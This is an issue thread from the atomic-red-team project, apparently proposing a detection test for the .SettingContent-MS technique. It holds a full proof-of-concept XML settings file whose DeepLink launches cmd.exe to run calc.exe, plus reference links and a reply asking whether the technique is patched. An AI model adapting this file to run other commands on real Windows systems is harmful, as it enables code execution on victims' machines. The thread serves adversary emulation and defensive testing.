### ISSUE TITLE
technique: .SettingContent-MS

### ISSUE THREAD

**Issue by MHaggis** [redcanaryco/atomic-red-team#295]
Example of .SettingContent-MS soon to be added to the ATT&CK Matrix

`<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\system32\cmd.exe /c calc.exe</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
    <SettingIdentity>
      <PageID></PageID>
      <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D}</HostID>
    </SettingIdentity>
    <SettingInformation>
      <Description>@shell32.dll,-4161</Description>
      <Keywords>@shell32.dll,-4161</Keywords>
    </SettingInformation>
  </SearchableContent>
</PCSettings>`

References:
https://gist.github.com/enigma0x3/b948b81717fd6b72e0a4baca033e07f8
https://enigma0x3.net/2018/06/11/the-tale-of-settingcontent-ms-files/

**Comment by caseysmithrc** [comment]
Do we still need this one? I think it has been patched?
